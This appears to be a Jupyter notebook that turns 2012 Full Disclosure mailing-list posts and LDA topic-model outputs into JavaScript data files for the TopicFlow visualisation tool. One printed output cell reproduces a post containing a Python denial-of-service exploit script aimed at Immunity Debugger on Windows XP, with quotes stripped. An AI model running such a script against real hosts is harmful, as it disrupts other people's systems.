In [103]:
import numpy as np
import pandas as pd
import json

pd.set_option('display.max_columns',9999)

Data Transformation

Test on 2012 data

Tweet.js


In [448]:
# monthList = ['Apr', 'May']
monthList = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']

In [449]:
# load the metadata of every month in monthList
# notice the encoding 'cp1252' (Western Europe)

# stores DataFrame of every month in monthList
dfList = []

for month in monthList:
    dfList.append(pd.read_csv(r"E:\GoogleDrive\Projects\PERCEIVE\data\Full Disclosure\2012 - Copy\Full_Disclosure_Mailing_List_" + month + "2012.csv",
                              encoding = 'cp1252',
                              index_col= 0)
                 )

In [450]:
# initialize the four fields of Tweet.js
tweet_id = None
author = []
tweet_date = []
text = []

# tweet_id: sequential ids across all months
total_len = sum(len(df) for df in dfList)
tweet_id = list(range(1, total_len + 1))

# author
for month_ix in range(len(monthList)):
    author += dfList[month_ix].author.apply(lambda x: x.replace('"','')).tolist()

# tweet_date
def format_date(x):
    # non-zero-padded 'M/D/YYYY H:M' timestamp string
    return str(x.month) + '/' + str(x.day) + '/' + str(x.year) + ' ' + str(x.hour) + ':' + str(x.minute)

for month_ix in range(len(monthList)):
    tweet_date += pd.to_datetime(dfList[month_ix].dateStamp).apply(format_date).tolist()

# text
for month_ix in range(len(monthList)):
    M = dfList[month_ix]
    for text_ix in range(len(M)):
        ix = str(M['k'].values[text_ix]) # the 'k' column holds the numeric part of the file name
        with open(r'E:\GoogleDrive\Projects\PERCEIVE\data\Full Disclosure\2012 - Copy\2012_' + monthList[month_ix] + '_' + ix + '.txt', 'r', encoding='cp1252') as textfile:
            # strip characters that could break the generated JavaScript: quotes, 'http://' prefixes, backslashes, newlines
            tmp = textfile.read().replace('"','').replace('http://','').replace('\\','').replace('\n','')
        text.append(tmp)
# text - TEST VERSION
# for month_ix in range(len(monthList)):
#     M = dfList[month_ix]
#     for text_ix in range(len(M)):
#         text.append('tmp')

There are a lot of characters and symbols in these messages that could cause problems, which is why quotes, 'http://' prefixes, backslashes, and newlines are stripped above.


In [411]:
text[0]


Out[411]:
"-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1Windows XP denial of service 0day found in CTF exerciseOof, this is almost as bad as that BackTrack 0 day released the other day (http://www.backtrack-linux.org/backtrack/backtrack-0day-privilege-escalation/).  Any response from Microsoft yet?  Justin C. Klein Keane http://www.MadIrish.net  The PGP signature on this email can be verified using the public key at http://www.madirish.net/gpgkey  On 04/17/2012 02:48 AM, Adam Behnke wrote:Immunity Debugger Remote Denial of Service 0Day Tested against version 1.76 and 1.80 on Windows XP distributions  Has not been tested for potential privilege escalation vectors.  We first wrote about Immunity Debugger here: http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/   Discovered by a student that wishes to remain anonymous in the course CTF. This 0day exploit for Windows was discovered by a student in the InfoSec Institute Ethical Hacking class, during an evening CTF exercise. The student wishes to remain anonymous, he has contributed a python version of the 0day. A patch that can be applied to Windows has not been made available. You can find a python version of the exploit to copy and paste here:   #!/usr/bin/python #Windows XP denial of service 0day exploit discovered on 4.9.12 by InfoSec Institute student #For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.htmlimport sysimport os import time import getopt import socket  class Error(Exception): def __init__(self, error):  self.errorStr=error  def __str__(self): return repr(self.errorStr)  class Exploit():  def __init__(self, targetHost, targetPort): self.targetHost = targetHost  def exploit(self, targetHost, targetPort):  try: socket.inet_aton(targetHost) s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  s.connect((targetHost,targetPort)) except socket.error: raise Error(Unable to exploit (Connect failed.)) sys.exit(0)  # exploit try: s.sendto(\\n\\n\\n, (targetHost, targetPort))  except: raise Error(Unable to exploit (Exploit failed.))   def usage(): print [!] Usage: print        ( -h, --help ): print  Print this message. print   ( --targetHost= ): Target host. print              --targetHost=127.0.0.1 print  ( --targetPort= ): Target port. print                 --targetPort=8888  def main(): print [$] Windows XP 0Day try: opts, args = getopt.getopt(sys.argv[1:], h, [help, targetHost=, targetPort=]) except getopt.GetoptError, err: # Print help information and exit: print '[!] Parameter error:'   str(err) # Will print something like option -a not recognized usage()  sys.exit(0)  targetHost=None targetPort=None  for opt, arg in opts: if opt in (-h, --help): usage() sys.exit(0) elif opt ==--targetHost:  targetHost=arg elif opt ==--targetPort: targetPort=arg else: # I would be assuming to say we'll never get here. print [!] Parameter error. usage() sys.exit(0)  if not targetHost: print [!] Parameter error: targetHost not set. usage() sys.exit(0)  if not targetPort: print [!] Parameter error: targetPort not set. usage() sys.exit(0)  exploit = Exploit(targetHost, targetPort)  print [*] Attempting to exploit:  try:  exploit.exploit(targetHost, int(targetPort)) except Error as error: print [!] Exploit Error: %s % (error.errorStr) exit(0)  print [*] Exploit appears to have worked.  # Standard boilerplate to call the main() function to begin # the program. if __name__=='__main__': main()    _______________________________________________ Full-Disclosure - We believe in it. 
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/  iPwEAQECAAYFAk NYXEACgkQkSlsbLsN1gBiggb/efTTww5szr9rcI NbsUzybuk rhPyvj99VJMMVCUjHrDrWKXQeTD/rrorY3SYMIGNlHzVWgqkiswM5N16Fy9MvqIH 2Cc8aJ5kh2xi9vtlCHlPZ7XJeN3tPEL 8/qOVbT7I2CNeD8JJseVfcJwnoEyyumm SZYmoxjJriMT7IAXysHJudaF294DvC z6drvF ou8wnVcIB0nkXoCVNsbcDK9dwS R4f0a QYN1tXM7 8za6/VznbDwcqw/amqeS3V883lqlt0XCHx5zIh VxG0qvB5Ui EPjoh3P/OEMP7PYRozM= =y j6 -----END PGP SIGNATURE-----  _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/\n"
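Since more troublesome characters may surface, the chained deletions above could be factored into a helper with an extensible pattern list. A minimal sketch (the sanitize helper is my addition and is not used by the cells below):

def sanitize(raw, patterns=('"', 'http://', '\\', '\n')):
    # same chained deletions as in the text loop above, expressed as a loop
    # so that new problem characters can be added in one place
    for p in patterns:
        raw = raw.replace(p, '')
    return raw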

In [452]:
# transform into json format
# first, transform into pd.DataFrame
df_tmp = pd.DataFrame({'tweet_id':tweet_id, 'author':author, 'tweet_date': tweet_date, 'text': text},
                      columns=['tweet_id','author','tweet_date','text'],
                      index=tweet_id)

# then, transform into json format
json_tmp = df_tmp.to_json(orient='index')

# finally, wrap in the .js format that TopicFlow can read
prefix = 'function populate_tweets_test(){\nvar tweet_data ='
suffix = ';\nreadTweetJSON(tweet_data);\n}'

tweetsJS = prefix + json_tmp + suffix

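A quick sanity check (my addition, not part of the original pipeline): strip the wrapper and confirm the payload is still valid JSON with one record per tweet.

payload = tweetsJS[len(prefix):-len(suffix)]
assert len(json.loads(payload)) == len(tweet_id)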
In [453]:
def get_tweets(month_abre):
    # placeholder: the Tweet.js logic above could later be refactored into a per-month function
    pass

In [454]:
# write

with open('Tweet.js', 'w') as file:
    file.write(tweetsJS)

Bins.js


In [473]:
# initialize the bins: each month is one bin, and each bin is itself a dictionary
binDict = {}
for month_ix in range(len(monthList)):
    binDict[str(month_ix)] = {}

! May want to check whether the key order in the dict matters; in Python 3.7+ dicts preserve insertion order, and json.dumps serializes keys in that order

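A quick check of that order (my addition):

# keys were inserted as '0', '1', ..., so serialization will follow that order
assert list(binDict.keys()) == [str(i) for i in range(len(monthList))]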

In [474]:
# bin_id
for month_ix in range(len(monthList)):
    binDict[str(month_ix)]['bin_id'] = month_ix

# tweet_ids
# needs input from dfList, specifically the length of each month
for month_ix in range(len(monthList)):
    binDict[str(month_ix)]['tweet_Ids'] = []

# slide a [lo, hi) window over the global tweet_id range, one month at a time
lo,hi = 1,1
for month_ix in range(len(monthList)):
    hi += len(dfList[month_ix])
    for tweet_ix in range(lo,hi):
        binDict[str(month_ix)]['tweet_Ids'].append(tweet_ix)
    lo = hi

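# (my addition) sanity check: the window above should partition the global
# tweet_id range exactly, with no gaps and no overlaps
all_ids = [i for m in range(len(monthList)) for i in binDict[str(m)]['tweet_Ids']]
assert all_ids == tweet_id
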
# start_time / end_time
# needs input from dfList, specifically the earliest and latest timestamp in each month
for month_ix in range(len(monthList)):
    stamps = pd.to_datetime(dfList[month_ix].dateStamp)
    binDict[str(month_ix)]['start_time'] = format_date(stamps.min())
    binDict[str(month_ix)]['end_time'] = format_date(stamps.max())

# initialize topic_model
for month_ix in range(len(monthList)):
    binDict[str(month_ix)]['topic_model'] = {}
    # 4 sub dictionaries
    binDict[str(month_ix)]['topic_model']['topic_doc'] = {}
    binDict[str(month_ix)]['topic_model']['doc_topic'] = {}
    binDict[str(month_ix)]['topic_model']['topic_word'] = {}
    binDict[str(month_ix)]['topic_model']['topic_prob'] = {}

! notice that the Topic-Doc matrix does not cover every document in the metadata, so len(Topic-Doc matrix) != number of tweet_ids above


In [475]:
# read topic-doc & topic-word data sets
# (a raw string cannot end in a backslash, so the path separator is concatenated separately)
dfTopicDoc = []

for month in monthList:
    dfTopicDoc.append(pd.read_csv(r"E:\GoogleDrive\Projects\PERCEIVE\data\LDA_VEM\2012_k_10_12\Document_topic_Matrix" + "\\" + month + ".csv",
                                  index_col= 0)
                     )

dfTopicWord = []
for month in monthList:
    dfTopicWord.append(pd.read_csv(r"E:\GoogleDrive\Projects\PERCEIVE\data\LDA_VEM\2012_k_10_12\Topic_Term_Matrix" + "\\" + month + ".csv",
                                   index_col= 0)
                      )

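To quantify the coverage gap flagged above (my addition; it reuses the filename slicing from the next cell, where positions 13:-4 strip the 'Mon/2012_Mon_' prefix and the '.txt' suffix):

for month_ix in range(len(monthList)):
    docs = {int(i[13:-4]) for i in dfTopicDoc[month_ix].index.values}
    meta = set(dfList[month_ix]['k'].values)
    print(monthList[month_ix], ':', len(docs & meta), 'of', len(meta), 'documents covered')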
In [476]:
# (re)initialize topic_model; re-running this resets the four sub-dictionaries created two cells above
for month_ix in range(len(monthList)):
    binDict[str(month_ix)]['topic_model'] = {}
    # 4 sub dictionaries
    binDict[str(month_ix)]['topic_model']['topic_doc'] = {}
    binDict[str(month_ix)]['topic_model']['doc_topic'] = {}
    binDict[str(month_ix)]['topic_model']['topic_word'] = {}
    binDict[str(month_ix)]['topic_model']['topic_prob'] = {}

In [477]:
# to begin this section, create a DataFrame mapping topics to documents; the documents in dfTopicDoc are not the same set as in the metadata
# pre-step 1, creates a list of the starting position of each month's tweet_id
month_start_tweetIds = []
Len = 0
for month_ix in range(len(monthList)):
    month_start_tweetIds.append(Len)
    Len += len(dfList[month_ix])

# pre-step 2, find the overlapping documents
for month_ix in range(len(monthList)):
    Doc_dfTopicDoc = []
    for i in dfTopicDoc[month_ix].index.values:
        Doc_dfTopicDoc.append(int(i[13:-4])) # positions 13:-4 strip the 'Mon/2012_Mon_' prefix and '.txt' suffix
    Overlap = set(Doc_dfTopicDoc) & set(dfList[month_ix]['k'].values)
    
    # pre-step 3, create a DataFrame mapping the overlapping documents and 10 topics
    Overlap_ix = []
    ix_list = dfTopicDoc[month_ix].index.tolist()
    for item in Overlap:
        name = str(monthList[month_ix]) + '/2012_' + str(monthList[month_ix]) + '_' + str(item) + '.txt'
        Overlap_ix.append(ix_list.index(name))
    dfTopicDoc_Overlap = dfTopicDoc[month_ix].iloc[Overlap_ix, : ].copy() # .copy() avoids the SettingWithCopyWarning when tweet_id is added below
    
    # pre-step 4, add tweet_ids to dfTopicDoc_Overlap
    Overlap_tweetIds = []
    for k in dfTopicDoc_Overlap.index.values:
        name = int(k[13:-4])
        name_ix = dfList[month_ix]['k'].tolist().index(name) + 1
        name_ix += month_start_tweetIds[month_ix]
        Overlap_tweetIds.append(name_ix)
    dfTopicDoc_Overlap['tweet_id'] = Overlap_tweetIds

    # topic_prob
    # is there an order? note this currently maps a positional index to the topic name, not to an actual probability
    L = len(dfTopicDoc[month_ix].columns)
    for ix in range(L):
        T = str(month_ix) + '_' + str(ix+1)
        binDict[str(month_ix)]['topic_model']['topic_prob'][str(ix)] = T
    
    # topic_doc
    # create 10 topic keys
    for ix in range(L):
        T = str(month_ix) + '_' + str(ix+1)
        binDict[str(month_ix)]['topic_model']['topic_doc'][T] = {}
    # add doc values to these keys
    for ix_2 in range(L):
        T = str(month_ix) + '_' + str(ix_2+1)
        col_score = dfTopicDoc_Overlap[str(ix_2+1)].values
        col_k = dfTopicDoc_Overlap['tweet_id'].values
        for ix_3 in range(len(col_score)):
            binDict[str(month_ix)]['topic_model']['topic_doc'][T][str(col_k[ix_3])] = col_score[ix_3]

    # doc_topic
    for ix_4 in range(len(dfTopicDoc_Overlap)):
        row_score = dfTopicDoc_Overlap.iloc[ix_4,:]
        binDict[str(month_ix)]['topic_model']['doc_topic'][ str(int(row_score['tweet_id'])) ] = {}
        for ix_5 in range(L):
            name = str(month_ix) + '_' + str(ix_5 + 1)
            binDict[str(month_ix)]['topic_model']['doc_topic'][ str(int(row_score['tweet_id'])) ][name] = row_score.iloc[ix_5] # positional access; integer [] on a label-indexed Series is ambiguous

    # topic_word
    for ix_6 in range(L):
        name = str(month_ix) + '_' + str(ix_6 + 1)
        binDict[str(month_ix)]['topic_model']['topic_word'][name] = {}
        topwords = dfTopicWord[month_ix].iloc[ix_6].sort_values(ascending=False)[:10]
        # we choose top 10 words, so below the range is 10
        for ix_7 in range(10):
            binDict[str(month_ix)]['topic_model']['topic_word'][name][topwords.index[ix_7]] = topwords.values[ix_7]



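To spot-check the assembled structure (my addition), peek at one topic's top words; '0_1' is the first topic of January under the naming scheme above.

print(binDict['0']['topic_model']['topic_word']['0_1'])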
In [478]:
# transform into json format
json_tmp = json.dumps(binDict)

# then, wrap in the .js format that TopicFlow can read
prefix = 'function populate_bins_test(){\nvar bin_data = '
suffix = ';\nreadBinJSON(bin_data);\n}'

BinsJS = prefix + json_tmp + suffix

In [479]:
# write

with open('Bins.js', 'w') as file:
    file.write(BinsJS)

TopicSimilarity.js


In [462]:
# read data set
dfTopicSim = pd.read_csv(r"E:\GoogleDrive\Projects\PERCEIVE\data\LDA_VEM\2012_k_10_12\Topic_Flow\topic_flow.csv")

# simDict
simDict = {}

# put topics into nodes, record their orders
nodes = []
for i in range(len(monthList)):
    for j in range(1,11):
        tmp = {}
        name = str(i) + '_' + str(j)
        value = np.random.randint(1,20) # I haven't figured out what this value means, so for now it is kept random
        tmp['name'], tmp['value'] = name, value
        nodes.append(tmp)

# put source, target, value into links
links = []
for month_ix in range(len(monthList) - 1):
    # get unique topic pairs between every two consecutive months
    mm1, mm2 = monthList[month_ix], monthList[month_ix + 1]
    sim = mm1 + '_' + mm2 + '_similarity'
    df_tmp = dfTopicSim[[mm1, mm2, sim]].dropna(axis=0).drop_duplicates()
    for row_ix in range(len(df_tmp)):
        source = month_ix*10 + int(df_tmp[mm1].values[row_ix]) - 1
        target = (month_ix+1)*10 + int(df_tmp[mm2].values[row_ix]) - 1
        score = df_tmp[sim].values[row_ix] * 500 # I don't know how the original values were derived; 500 is an arbitrary scaling factor
        link_tmp = {}
        link_tmp['source'], link_tmp['target'], link_tmp['value'] = source, target, score
        links.append(link_tmp)
        
# put two lists into simDict
simDict['nodes'], simDict['links'] = nodes, links

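A consistency check on the flow data (my addition): every link endpoint must be a valid index into nodes, assuming 10 topics per month as above.

n = len(nodes)
assert all(0 <= l['source'] < n and 0 <= l['target'] < n for l in links)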
In [463]:
# transform into json format
json_tmp = json.dumps(simDict)

# then, wrap in the .js format that TopicFlow can read
prefix = 'function populate_similarity_test(){\nvar sim_data = '
suffix = ';\nreadSimilarityJSON(sim_data);\n}'

TopicSimilarityJS = prefix + json_tmp + suffix

In [465]:
# write

with open('TopicSimilarity.js', 'w') as file:
    file.write(TopicSimilarityJS)